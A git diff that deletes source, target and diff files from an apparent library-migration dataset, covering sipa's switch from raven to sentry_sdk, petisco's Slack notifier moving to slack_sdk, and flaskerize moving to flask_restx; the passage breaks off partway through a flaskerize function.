-def test_summary(): - args = Arguments(query="summary", output_format="yaml") - run_query(args) - - -def test__no_data_types__should_throw_error(): - args = Arguments(query="detail") - run_query(args) diff --git a/v1/data/codefile/agdsn@sipa__ea23791__sipa$initialization.py.diff b/v1/data/codefile/agdsn@sipa__ea23791__sipa$initialization.py.diff deleted file mode 100644 index 474fee5..0000000 --- a/v1/data/codefile/agdsn@sipa__ea23791__sipa$initialization.py.diff +++ /dev/null @@ -1,58 +0,0 @@ -diff --git a/sipa/initialization.py b/sipa/initialization.py - index 48b67d395b58bf0a4fa21b28a6557cf4750efcb2..ea23791cfdc36d614189418a01a57c78859fa5e8 100644 - --- a/sipa/initialization.py - +++ b/sipa/initialization.py -@@ -5,12 +5,11 @@ import os - import os.path - from datetime import datetime - -+import sentry_sdk - from flask_babel import Babel, get_locale --from raven import setup_logging --from raven.contrib.flask import Sentry --from raven.handlers.logging import SentryHandler - from werkzeug.contrib.fixers import ProxyFix - from flask_qrcode import QRcode -+from sentry_sdk.integrations.flask import FlaskIntegration - - from sipa.babel import possible_locales, save_user_locale_setting, select_locale - from sipa.base import IntegerConverter, login_manager -@@ -180,24 +179,22 @@ def init_logging(app): - - If given and existent, apply the additional config file - """ - -- # Configure 
Sentry client (raven) -- if app.config['SENTRY_DSN']: -- logger.debug("Sentry DSN: %s", app.config['SENTRY_DSN']) -- sentry = Sentry() -- sentry.init_app(app, dsn=app.config['SENTRY_DSN']) -+ # TODO simplify this, by a lot. - -- def register_sentry_handler(): -- handler = SentryHandler() -- -- handler.client = app.extensions['sentry'].client -- setup_logging(handler) -- -- return handler -- else: -+ if not (dsn := app.config['SENTRY_DSN']): - logger.debug("No sentry DSN specified") -- -- def register_sentry_handler(): -- return logging.NullHandler() -+ # Configure Sentry SDK -+ else: -+ logger.debug("Sentry DSN: %s", dsn) -+ sentry_sdk.init( -+ dsn=dsn, -+ integrations=[FlaskIntegration()], -+ traces_sample_rate = 1.0, -+ # release="myapp@1.0.0", -+ ) -+ -+ def register_sentry_handler(): -+ return logging.NullHandler() - - # Apply default config dict - config = replace_empty_handler_callables(DEFAULT_CONFIG, diff --git a/v1/data/codefile/agdsn@sipa__ea23791__sipa$initialization.py.source.py b/v1/data/codefile/agdsn@sipa__ea23791__sipa$initialization.py.source.py deleted file mode 100644 index 2c8355f..0000000 --- a/v1/data/codefile/agdsn@sipa__ea23791__sipa$initialization.py.source.py +++ /dev/null @@ -1,215 +0,0 @@ -# -*- coding: utf-8 -*- -import logging -import logging.config -import os -import os.path -from datetime import datetime - -from flask_babel import Babel, get_locale -from raven import setup_logging -from raven.contrib.flask import Sentry -from raven.handlers.logging import SentryHandler -from werkzeug.contrib.fixers import ProxyFix -from flask_qrcode import QRcode - -from sipa.babel import possible_locales, save_user_locale_setting, select_locale -from sipa.base import IntegerConverter, login_manager -from sipa.blueprints.usersuite import get_attribute_endpoint -from sipa.defaults import DEFAULT_CONFIG -from sipa.flatpages import CategorizedFlatPages -from sipa.forms import render_links -from sipa.model import build_backends_ext -from sipa.model.misc import should_display_traffic_data -from sipa.session import SeparateLocaleCookieSessionInterface -from sipa.utils import replace_empty_handler_callables, url_self -from sipa.utils.babel_utils import get_weekday -from sipa.utils.git_utils import init_repo, update_repo -from sipa.utils.graph_utils import generate_traffic_chart, provide_render_function - -logger = logging.getLogger(__name__) -logger.addHandler(logging.StreamHandler()) # for before logging is configured - - -def init_app(app, **kwargs): - """Initialize the Flask app located in the module sipa. 
- This initializes the Flask app by: - - * calling the internal init_app() procedures of each module - * registering the Blueprints - * registering the Jinja global variables - """ - load_config_file(app, config=kwargs.pop('config', None)) - app.wsgi_app = ProxyFix(app.wsgi_app, app.config['NUM_PROXIES']) - init_logging(app) - init_env_and_config(app) - logger.debug('Initializing app') - login_manager.init_app(app) - babel = Babel() - babel.init_app(app) - babel.localeselector(select_locale) - app.before_request(save_user_locale_setting) - app.session_interface = SeparateLocaleCookieSessionInterface() - cf_pages = CategorizedFlatPages() - cf_pages.init_app(app) - backends = build_backends_ext() - backends.init_app(app) - QRcode(app) - - app.url_map.converters['int'] = IntegerConverter - - from sipa.blueprints import bp_features, bp_usersuite, \ - bp_pages, bp_documents, bp_news, bp_generic, bp_hooks, bp_register - - logger.debug('Registering blueprints') - app.register_blueprint(bp_generic) - app.register_blueprint(bp_features) - app.register_blueprint(bp_usersuite) - app.register_blueprint(bp_pages) - app.register_blueprint(bp_documents) - app.register_blueprint(bp_news) - app.register_blueprint(bp_hooks) - app.register_blueprint(bp_register) - - logger.debug('Registering Jinja globals') - form_label_width = 3 - form_input_width = 7 - app.jinja_env.globals.update( - cf_pages=cf_pages, - get_locale=get_locale, - get_weekday=get_weekday, - possible_locales=possible_locales, - get_attribute_endpoint=get_attribute_endpoint, - should_display_traffic_data=should_display_traffic_data, - traffic_chart=provide_render_function(generate_traffic_chart), - current_datasource=backends.current_datasource, - form_label_width_class="col-sm-{}".format(form_label_width), - form_input_width_class="col-sm-{}".format(form_input_width), - form_input_offset_class="col-sm-offset-{}".format(form_label_width), - url_self=url_self, - now=datetime.utcnow() - ) - app.add_template_filter(render_links) - logger.debug("Jinja globals have been set", - extra={'data': {'jinja_globals': app.jinja_env.globals}}) - - backends.init_backends() - - -def load_config_file(app, config=None): - """Just load the config file, do nothing else""" - # default configuration - app.config.from_pyfile(os.path.realpath("sipa/config/default.py")) - - if config: - app.config.update(config) - - # if local config file exists, load everything into local space. - if 'SIPA_CONFIG_FILE' in os.environ: - try: - app.config.from_envvar('SIPA_CONFIG_FILE') - except IOError: - logger.warning("SIPA_CONFIG_FILE not readable: %s", - os.environ['SIPA_CONFIG_FILE']) - else: - logger.info("Successfully read config file %s", - os.environ['SIPA_CONFIG_FILE']) - else: - logger.info("No SIPA_CONFIG_FILE configured. Moving on.") - - -def init_env_and_config(app): - if not app.config['FLATPAGES_ROOT']: - app.config['FLATPAGES_ROOT'] = os.path.join( - os.path.dirname(os.path.abspath(__file__)), - '../content') - if app.config['CONTENT_URL']: - init_repo(app.config["FLATPAGES_ROOT"], app.config['CONTENT_URL']) - else: - if not os.path.isdir(app.config['FLATPAGES_ROOT']): - try: - os.mkdir(app.config['FLATPAGES_ROOT']) - except PermissionError as e: - raise RuntimeError( - "The FLATPAGES_ROOT does not exist and cannot be created." - "\nIf you are runing from inside a container using mounts," - " please create the directory at the given location" - "\n(default: `/content`," - " else: see what has been passed as configuration)." 
- ) from e - - if app.config['UWSGI_TIMER_ENABLED']: - try_register_uwsgi_timer(app=app) - - app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False - - if not app.config.get('SECRET_KEY'): - if not app.debug: - logger.warning('SECRET_KEY not set. Using default Key.') - app.config['SECRET_KEY'] = "yIhswxbuDCvK8a6EDGihW6xjNognxtyO85SI" - - -def try_register_uwsgi_timer(app): - """Register the uwsgi timer if uwsgi isavailable""" - try: - import uwsgi - from uwsgidecorators import timer - except ImportError: - logger.info("uwsgi package not found, uwsgi_timer hasn't been set") - else: - @timer(300) - def update_uwsgi(signum): - flatpages_root = app.config["FLATPAGES_ROOT"] - logger.debug("Updating git repository at %s", flatpages_root) - hasToReload = update_repo(flatpages_root) - if hasToReload: - logger.debug("Reloading flatpages and uwsgi", extra={'data': { - 'uwsgi.numproc': uwsgi.numproc, - 'uwsgi.opt': uwsgi.opt, - 'uwsgi.applications': uwsgi.applications, - }}) - uwsgi.reload() - - logger.debug("Registered repo update to uwsgi signal") - - -def init_logging(app): - """Initialize the app's logging mechanisms - - - Configure the sentry client, if a DSN is given - - Apply the default config dict (`defaults.DEFAULT_CONFIG`) - - If given and existent, apply the additional config file - """ - - # Configure Sentry client (raven) - if app.config['SENTRY_DSN']: - logger.debug("Sentry DSN: %s", app.config['SENTRY_DSN']) - sentry = Sentry() - sentry.init_app(app, dsn=app.config['SENTRY_DSN']) - - def register_sentry_handler(): - handler = SentryHandler() - - handler.client = app.extensions['sentry'].client - setup_logging(handler) - - return handler - else: - logger.debug("No sentry DSN specified") - - def register_sentry_handler(): - return logging.NullHandler() - - # Apply default config dict - config = replace_empty_handler_callables(DEFAULT_CONFIG, - register_sentry_handler) - logging.config.dictConfig(config) - - if app.config.get('LOG_CONFIG') is not None: - config = replace_empty_handler_callables(app.config['LOG_CONFIG'], - register_sentry_handler) - logging.config.dictConfig(config) - - logger.debug('Initialized logging', extra={'data': { - 'DEFAULT_CONFIG': DEFAULT_CONFIG, - 'EXTRA_CONFIG': app.config.get('LOG_CONFIG') - }}) diff --git a/v1/data/codefile/agdsn@sipa__ea23791__sipa$initialization.py.target.py b/v1/data/codefile/agdsn@sipa__ea23791__sipa$initialization.py.target.py deleted file mode 100644 index 0849b23..0000000 --- a/v1/data/codefile/agdsn@sipa__ea23791__sipa$initialization.py.target.py +++ /dev/null @@ -1,212 +0,0 @@ -# -*- coding: utf-8 -*- -import logging -import logging.config -import os -import os.path -from datetime import datetime - -import sentry_sdk -from flask_babel import Babel, get_locale -from werkzeug.contrib.fixers import ProxyFix -from flask_qrcode import QRcode -from sentry_sdk.integrations.flask import FlaskIntegration - -from sipa.babel import possible_locales, save_user_locale_setting, select_locale -from sipa.base import IntegerConverter, login_manager -from sipa.blueprints.usersuite import get_attribute_endpoint -from sipa.defaults import DEFAULT_CONFIG -from sipa.flatpages import CategorizedFlatPages -from sipa.forms import render_links -from sipa.model import build_backends_ext -from sipa.model.misc import should_display_traffic_data -from sipa.session import SeparateLocaleCookieSessionInterface -from sipa.utils import replace_empty_handler_callables, url_self -from sipa.utils.babel_utils import get_weekday -from sipa.utils.git_utils import init_repo, 
update_repo -from sipa.utils.graph_utils import generate_traffic_chart, provide_render_function - -logger = logging.getLogger(__name__) -logger.addHandler(logging.StreamHandler()) # for before logging is configured - - -def init_app(app, **kwargs): - """Initialize the Flask app located in the module sipa. - This initializes the Flask app by: - - * calling the internal init_app() procedures of each module - * registering the Blueprints - * registering the Jinja global variables - """ - load_config_file(app, config=kwargs.pop('config', None)) - app.wsgi_app = ProxyFix(app.wsgi_app, app.config['NUM_PROXIES']) - init_logging(app) - init_env_and_config(app) - logger.debug('Initializing app') - login_manager.init_app(app) - babel = Babel() - babel.init_app(app) - babel.localeselector(select_locale) - app.before_request(save_user_locale_setting) - app.session_interface = SeparateLocaleCookieSessionInterface() - cf_pages = CategorizedFlatPages() - cf_pages.init_app(app) - backends = build_backends_ext() - backends.init_app(app) - QRcode(app) - - app.url_map.converters['int'] = IntegerConverter - - from sipa.blueprints import bp_features, bp_usersuite, \ - bp_pages, bp_documents, bp_news, bp_generic, bp_hooks, bp_register - - logger.debug('Registering blueprints') - app.register_blueprint(bp_generic) - app.register_blueprint(bp_features) - app.register_blueprint(bp_usersuite) - app.register_blueprint(bp_pages) - app.register_blueprint(bp_documents) - app.register_blueprint(bp_news) - app.register_blueprint(bp_hooks) - app.register_blueprint(bp_register) - - logger.debug('Registering Jinja globals') - form_label_width = 3 - form_input_width = 7 - app.jinja_env.globals.update( - cf_pages=cf_pages, - get_locale=get_locale, - get_weekday=get_weekday, - possible_locales=possible_locales, - get_attribute_endpoint=get_attribute_endpoint, - should_display_traffic_data=should_display_traffic_data, - traffic_chart=provide_render_function(generate_traffic_chart), - current_datasource=backends.current_datasource, - form_label_width_class="col-sm-{}".format(form_label_width), - form_input_width_class="col-sm-{}".format(form_input_width), - form_input_offset_class="col-sm-offset-{}".format(form_label_width), - url_self=url_self, - now=datetime.utcnow() - ) - app.add_template_filter(render_links) - logger.debug("Jinja globals have been set", - extra={'data': {'jinja_globals': app.jinja_env.globals}}) - - backends.init_backends() - - -def load_config_file(app, config=None): - """Just load the config file, do nothing else""" - # default configuration - app.config.from_pyfile(os.path.realpath("sipa/config/default.py")) - - if config: - app.config.update(config) - - # if local config file exists, load everything into local space. - if 'SIPA_CONFIG_FILE' in os.environ: - try: - app.config.from_envvar('SIPA_CONFIG_FILE') - except IOError: - logger.warning("SIPA_CONFIG_FILE not readable: %s", - os.environ['SIPA_CONFIG_FILE']) - else: - logger.info("Successfully read config file %s", - os.environ['SIPA_CONFIG_FILE']) - else: - logger.info("No SIPA_CONFIG_FILE configured. 
Moving on.") - - -def init_env_and_config(app): - if not app.config['FLATPAGES_ROOT']: - app.config['FLATPAGES_ROOT'] = os.path.join( - os.path.dirname(os.path.abspath(__file__)), - '../content') - if app.config['CONTENT_URL']: - init_repo(app.config["FLATPAGES_ROOT"], app.config['CONTENT_URL']) - else: - if not os.path.isdir(app.config['FLATPAGES_ROOT']): - try: - os.mkdir(app.config['FLATPAGES_ROOT']) - except PermissionError as e: - raise RuntimeError( - "The FLATPAGES_ROOT does not exist and cannot be created." - "\nIf you are runing from inside a container using mounts," - " please create the directory at the given location" - "\n(default: `/content`," - " else: see what has been passed as configuration)." - ) from e - - if app.config['UWSGI_TIMER_ENABLED']: - try_register_uwsgi_timer(app=app) - - app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False - - if not app.config.get('SECRET_KEY'): - if not app.debug: - logger.warning('SECRET_KEY not set. Using default Key.') - app.config['SECRET_KEY'] = "yIhswxbuDCvK8a6EDGihW6xjNognxtyO85SI" - - -def try_register_uwsgi_timer(app): - """Register the uwsgi timer if uwsgi isavailable""" - try: - import uwsgi - from uwsgidecorators import timer - except ImportError: - logger.info("uwsgi package not found, uwsgi_timer hasn't been set") - else: - @timer(300) - def update_uwsgi(signum): - flatpages_root = app.config["FLATPAGES_ROOT"] - logger.debug("Updating git repository at %s", flatpages_root) - hasToReload = update_repo(flatpages_root) - if hasToReload: - logger.debug("Reloading flatpages and uwsgi", extra={'data': { - 'uwsgi.numproc': uwsgi.numproc, - 'uwsgi.opt': uwsgi.opt, - 'uwsgi.applications': uwsgi.applications, - }}) - uwsgi.reload() - - logger.debug("Registered repo update to uwsgi signal") - - -def init_logging(app): - """Initialize the app's logging mechanisms - - - Configure the sentry client, if a DSN is given - - Apply the default config dict (`defaults.DEFAULT_CONFIG`) - - If given and existent, apply the additional config file - """ - - # TODO simplify this, by a lot. 
- - if not (dsn := app.config['SENTRY_DSN']): - logger.debug("No sentry DSN specified") - # Configure Sentry SDK - else: - logger.debug("Sentry DSN: %s", dsn) - sentry_sdk.init( - dsn=dsn, - integrations=[FlaskIntegration()], - traces_sample_rate = 1.0, - # release="myapp@1.0.0", - ) - - def register_sentry_handler(): - return logging.NullHandler() - - # Apply default config dict - config = replace_empty_handler_callables(DEFAULT_CONFIG, - register_sentry_handler) - logging.config.dictConfig(config) - - if app.config.get('LOG_CONFIG') is not None: - config = replace_empty_handler_callables(app.config['LOG_CONFIG'], - register_sentry_handler) - logging.config.dictConfig(config) - - logger.debug('Initialized logging', extra={'data': { - 'DEFAULT_CONFIG': DEFAULT_CONFIG, - 'EXTRA_CONFIG': app.config.get('LOG_CONFIG') - }}) diff --git a/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$application$notifier$slack_notifier.py.diff b/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$application$notifier$slack_notifier.py.diff deleted file mode 100644 index 5dc0c8e..0000000 --- a/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$application$notifier$slack_notifier.py.diff +++ /dev/null @@ -1,65 +0,0 @@ -diff --git a/petisco/extra/slack/application/notifier/slack_notifier.py b/petisco/extra/slack/application/notifier/slack_notifier.py - index 9e680d2d654faaffa1e233f911f77a7c0b779b0e..9abf7b1f6ef8c55bdddcb9a5c2eff513f6a93130 100644 - --- a/petisco/extra/slack/application/notifier/slack_notifier.py - +++ b/petisco/extra/slack/application/notifier/slack_notifier.py -@@ -1,15 +1,21 @@ - from typing import Optional - --from slack import WebClient --from slack.errors import SlackApiError -+from slack_sdk import WebClient -+from slack_sdk.errors import SlackApiError - - from petisco.base.application.notifier.notifier import Notifier -+from petisco.base.application.notifier.notifier_exception_message import ( -+ NotifierExceptionMessage, -+) - from petisco.base.application.notifier.notifier_message import NotifierMessage - from petisco.base.domain.errors.domain_error import DomainError - from petisco.extra.slack.application.notifier.blocks_slack_notifier_message_converter import ( - BlocksSlackNotifierMessageConverter, - SlackNotifierMessageConverter, - ) -+from petisco.extra.slack.application.notifier.exception_blocks_slack_notifier_message_converter import ( -+ ExceptionBlocksSlackNotifierMessageConverter, -+) - - - class SlackError(DomainError): -@@ -24,19 +30,31 @@ class SlackNotifier(Notifier): - converter: Optional[ - SlackNotifierMessageConverter - ] = BlocksSlackNotifierMessageConverter(), -+ exception_converter: Optional[ -+ SlackNotifierMessageConverter -+ ] = ExceptionBlocksSlackNotifierMessageConverter(), - ): -- self.token = token - self.channel = channel - self.converter = converter -+ self.exception_converter = exception_converter -+ self.client = WebClient(token=token) - - def publish(self, notifier_message: NotifierMessage): -+ try: -+ self.client.chat_postMessage( -+ channel=self.channel, -+ blocks=self.converter.convert(notifier_message), -+ text=notifier_message.title, -+ ) -+ except SlackApiError as e: -+ raise SlackError(e.response["error"]) - -- client = WebClient(token=self.token) -- -+ def publish_exception(self, notifier_exception_message: NotifierExceptionMessage): - try: -- client.chat_postMessage( -+ self.client.chat_postMessage( - channel=self.channel, -- 
blocks=self.converter.convert(notifier_message=notifier_message), -+ blocks=self.exception_converter.convert(notifier_exception_message), -+ text=notifier_exception_message.title, - ) - except SlackApiError as e: - raise SlackError(e.response["error"]) diff --git a/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$application$notifier$slack_notifier.py.source.py b/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$application$notifier$slack_notifier.py.source.py deleted file mode 100644 index c41829c..0000000 --- a/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$application$notifier$slack_notifier.py.source.py +++ /dev/null @@ -1,42 +0,0 @@ -from typing import Optional - -from slack import WebClient -from slack.errors import SlackApiError - -from petisco.base.application.notifier.notifier import Notifier -from petisco.base.application.notifier.notifier_message import NotifierMessage -from petisco.base.domain.errors.domain_error import DomainError -from petisco.extra.slack.application.notifier.blocks_slack_notifier_message_converter import ( - BlocksSlackNotifierMessageConverter, - SlackNotifierMessageConverter, -) - - -class SlackError(DomainError): - pass - - -class SlackNotifier(Notifier): - def __init__( - self, - token: str, - channel: str, - converter: Optional[ - SlackNotifierMessageConverter - ] = BlocksSlackNotifierMessageConverter(), - ): - self.token = token - self.channel = channel - self.converter = converter - - def publish(self, notifier_message: NotifierMessage): - - client = WebClient(token=self.token) - - try: - client.chat_postMessage( - channel=self.channel, - blocks=self.converter.convert(notifier_message=notifier_message), - ) - except SlackApiError as e: - raise SlackError(e.response["error"]) diff --git a/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$application$notifier$slack_notifier.py.target.py b/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$application$notifier$slack_notifier.py.target.py deleted file mode 100644 index d58a1be..0000000 --- a/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$application$notifier$slack_notifier.py.target.py +++ /dev/null @@ -1,60 +0,0 @@ -from typing import Optional - -from slack_sdk import WebClient -from slack_sdk.errors import SlackApiError - -from petisco.base.application.notifier.notifier import Notifier -from petisco.base.application.notifier.notifier_exception_message import ( - NotifierExceptionMessage, -) -from petisco.base.application.notifier.notifier_message import NotifierMessage -from petisco.base.domain.errors.domain_error import DomainError -from petisco.extra.slack.application.notifier.blocks_slack_notifier_message_converter import ( - BlocksSlackNotifierMessageConverter, - SlackNotifierMessageConverter, -) -from petisco.extra.slack.application.notifier.exception_blocks_slack_notifier_message_converter import ( - ExceptionBlocksSlackNotifierMessageConverter, -) - - -class SlackError(DomainError): - pass - - -class SlackNotifier(Notifier): - def __init__( - self, - token: str, - channel: str, - converter: Optional[ - SlackNotifierMessageConverter - ] = BlocksSlackNotifierMessageConverter(), - exception_converter: Optional[ - SlackNotifierMessageConverter - ] = ExceptionBlocksSlackNotifierMessageConverter(), - ): - self.channel = channel - self.converter = converter - self.exception_converter = exception_converter - self.client = WebClient(token=token) - - def publish(self, 
notifier_message: NotifierMessage): - try: - self.client.chat_postMessage( - channel=self.channel, - blocks=self.converter.convert(notifier_message), - text=notifier_message.title, - ) - except SlackApiError as e: - raise SlackError(e.response["error"]) - - def publish_exception(self, notifier_exception_message: NotifierExceptionMessage): - try: - self.client.chat_postMessage( - channel=self.channel, - blocks=self.exception_converter.convert(notifier_exception_message), - text=notifier_exception_message.title, - ) - except SlackApiError as e: - raise SlackError(e.response["error"]) diff --git a/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$is_slack_available.py.diff b/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$is_slack_available.py.diff deleted file mode 100644 index b83ebd6..0000000 --- a/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$is_slack_available.py.diff +++ /dev/null @@ -1,12 +0,0 @@ -diff --git a/petisco/extra/slack/is_slack_available.py b/petisco/extra/slack/is_slack_available.py - index 9e680d2d654faaffa1e233f911f77a7c0b779b0e..9abf7b1f6ef8c55bdddcb9a5c2eff513f6a93130 100644 - --- a/petisco/extra/slack/is_slack_available.py - +++ b/petisco/extra/slack/is_slack_available.py -@@ -1,6 +1,6 @@ - def is_slack_available() -> bool: - try: -- import slack # noqa -+ import slack_sdk # noqa - except (RuntimeError, ImportError): - return False - return True diff --git a/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$is_slack_available.py.source.py b/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$is_slack_available.py.source.py deleted file mode 100644 index c932bbb..0000000 --- a/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$is_slack_available.py.source.py +++ /dev/null @@ -1,6 +0,0 @@ -def is_slack_available() -> bool: - try: - import slack # noqa - except (RuntimeError, ImportError): - return False - return True diff --git a/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$is_slack_available.py.target.py b/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$is_slack_available.py.target.py deleted file mode 100644 index e8ceac7..0000000 --- a/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$is_slack_available.py.target.py +++ /dev/null @@ -1,6 +0,0 @@ -def is_slack_available() -> bool: - try: - import slack_sdk # noqa - except (RuntimeError, ImportError): - return False - return True diff --git a/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$legacy$notifier$infrastructure$slack$slack_notifier.py.diff b/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$legacy$notifier$infrastructure$slack$slack_notifier.py.diff deleted file mode 100644 index f8c5ba3..0000000 --- a/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$legacy$notifier$infrastructure$slack$slack_notifier.py.diff +++ /dev/null @@ -1,12 +0,0 @@ -diff --git a/petisco/legacy/notifier/infrastructure/slack/slack_notifier.py b/petisco/legacy/notifier/infrastructure/slack/slack_notifier.py - index 9e680d2d654faaffa1e233f911f77a7c0b779b0e..9abf7b1f6ef8c55bdddcb9a5c2eff513f6a93130 100644 - --- a/petisco/legacy/notifier/infrastructure/slack/slack_notifier.py - +++ b/petisco/legacy/notifier/infrastructure/slack/slack_notifier.py -@@ -1,5 +1,5 @@ --from slack import WebClient --from slack.errors import SlackApiError -+from slack_sdk import WebClient -+from slack_sdk.errors import 
SlackApiError - - from petisco.legacy.notifier.domain.interface_notifier import INotifier - from petisco.legacy.notifier.domain.notifier_message import NotifierMessage diff --git a/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$legacy$notifier$infrastructure$slack$slack_notifier.py.source.py b/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$legacy$notifier$infrastructure$slack$slack_notifier.py.source.py deleted file mode 100644 index efb2a26..0000000 --- a/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$legacy$notifier$infrastructure$slack$slack_notifier.py.source.py +++ /dev/null @@ -1,36 +0,0 @@ -from slack import WebClient -from slack.errors import SlackApiError - -from petisco.legacy.notifier.domain.interface_notifier import INotifier -from petisco.legacy.notifier.domain.notifier_message import NotifierMessage -from petisco.legacy.notifier.infrastructure.slack.errors import SlackError -from petisco.legacy.notifier.infrastructure.slack.interface_slack_notifier_message_converter import ( - ISlackNotifierMessageConverter, -) -from petisco.legacy.notifier.infrastructure.slack.slack_notifier_message_converter import ( - SlackNotifierMessageConverter, -) - - -class SlackNotifier(INotifier): - def __init__( - self, - token: str, - channel: str, - converter: ISlackNotifierMessageConverter = SlackNotifierMessageConverter(), - ): - self.token = token - self.channel = channel - self.converter = converter - - def publish(self, notifier_message: NotifierMessage): - - client = WebClient(token=self.token) - - try: - client.chat_postMessage( - channel=self.channel, - blocks=self.converter.convert(notifier_message=notifier_message), - ) - except SlackApiError as e: - raise SlackError(e.response["error"]) diff --git a/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$legacy$notifier$infrastructure$slack$slack_notifier.py.target.py b/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$legacy$notifier$infrastructure$slack$slack_notifier.py.target.py deleted file mode 100644 index c9b74d8..0000000 --- a/v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$legacy$notifier$infrastructure$slack$slack_notifier.py.target.py +++ /dev/null @@ -1,36 +0,0 @@ -from slack_sdk import WebClient -from slack_sdk.errors import SlackApiError - -from petisco.legacy.notifier.domain.interface_notifier import INotifier -from petisco.legacy.notifier.domain.notifier_message import NotifierMessage -from petisco.legacy.notifier.infrastructure.slack.errors import SlackError -from petisco.legacy.notifier.infrastructure.slack.interface_slack_notifier_message_converter import ( - ISlackNotifierMessageConverter, -) -from petisco.legacy.notifier.infrastructure.slack.slack_notifier_message_converter import ( - SlackNotifierMessageConverter, -) - - -class SlackNotifier(INotifier): - def __init__( - self, - token: str, - channel: str, - converter: ISlackNotifierMessageConverter = SlackNotifierMessageConverter(), - ): - self.token = token - self.channel = channel - self.converter = converter - - def publish(self, notifier_message: NotifierMessage): - - client = WebClient(token=self.token) - - try: - client.chat_postMessage( - channel=self.channel, - blocks=self.converter.convert(notifier_message=notifier_message), - ) - except SlackApiError as e: - raise SlackError(e.response["error"]) diff --git a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$generate.py.diff b/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$generate.py.diff deleted file mode 100644 index 
index 7fc2b06..0000000
--- a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$generate.py.diff
+++ /dev/null
@@ -1,13 +0,0 @@
-diff --git a/flaskerize/generate.py b/flaskerize/generate.py
- index ab2ea26e8a6180adc43c43e24f5ecb3ad3708e89..59d8319355bf95f26949fe13ac3d6be5b5282fb6 100644
- --- a/flaskerize/generate.py
- +++ b/flaskerize/generate.py
-@@ -149,7 +149,7 @@ def namespace(args):
-     """
-
-     CONTENTS = f"""from flask import request, jsonify
--from flask_restplus import Namespace, Resource
-+from flask_restx import Namespace, Resource
- from flask_accepts import accepts, responds
- import marshmallow as ma
-
diff --git a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$generate.py.source.py b/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$generate.py.source.py
deleted file mode 100644
index ae88961..0000000
--- a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$generate.py.source.py
+++ /dev/null
@@ -1,302 +0,0 @@
-from typing import Callable, Dict
-
-HEADER = """# DO NOT EDIT THIS FILE. It is generated by flaskerize and may be
-# overwritten"""
-
-
-def _generate(
-    contents,
-    output_name: str,
-    filename: str = None,
-    mode: str = "w",
-    dry_run: bool = False,
-) -> None:
-    if dry_run:
-        print(contents)
-    else:
-        if filename is None:
-            filename = f'{output_name.replace(".py", "")}.py'
-        with open(filename, mode) as fid:
-            fid.write(contents)
-
-        if filename:
-            print(f"Successfully created {filename}")
-
-
-def hello_world(args) -> None:
-    print("Generating a hello_world app")
-
-    CONTENTS = f"""{HEADER}
-
-import os
-from flask import Flask, send_from_directory
-
-def create_app():
-    app = Flask(__name__)
-
-    # Serve React App
-    @app.route('/')
-    def serve():
-        return 'Hello, Flaskerize!'
-    return app
-
-if __name__ == '__main__':
-    app = create_app()
-    app.run()
-
-    """
-    _generate(
-        CONTENTS,
-        output_name=args.output_name,
-        filename=args.output_file,
-        dry_run=args.dry_run,
-    )
-    print("Successfully created new app")
-
-
-def app_from_dir(args) -> None:
-    """
-    Serve files using `send_from_directory`. Note this is less secure than
-    from_static_files as anything within the directory can be served.
- """ - - print("Generating an app from static site directory") - - # The routing for `send_from_directory` comes directly from https://stackoverflow.com/questions/44209978/serving-a-create-react-app-with-flask # noqa - CONTENTS = f"""{HEADER} - -import os -from flask import Flask, send_from_directory - - -def create_app(): - app = Flask(__name__, static_folder='{args.source}') - - # Serve static site - @app.route('/') - def index(): - return send_from_directory(app.static_folder, 'index.html') - - return app - -if __name__ == '__main__': - app = create_app() - app.run() - -""" - _generate( - CONTENTS, - output_name=args.output_name, - filename=args.output_file, - dry_run=args.dry_run, - ) - print("Successfully created new app") - - -def blueprint(args): - """ - Static site blueprint - """ - - print("Generating a blueprint from static site") - - # The routing for `send_from_directory` comes directly from https://stackoverflow.com/questions/44209978/serving-a-create-react-app-with-flask # noqa - CONTENTS = f"""{HEADER} - -import os -from flask import Blueprint, send_from_directory - -site = Blueprint('site', __name__, static_folder='{args.source}') - -# Serve static site -@site.route('/') -def index(): - return send_from_directory(site.static_folder, 'index.html') - -""" - _generate( - CONTENTS, - output_name=args.output_name, - filename=args.output_file, - dry_run=args.dry_run, - ) - print("Successfully created new blueprint") - - -def wsgi(args): - from flaskerize.utils import split_file_factory - - filename, func = split_file_factory(args.source) - filename = filename.replace(".py", "") - - CONTENTS = 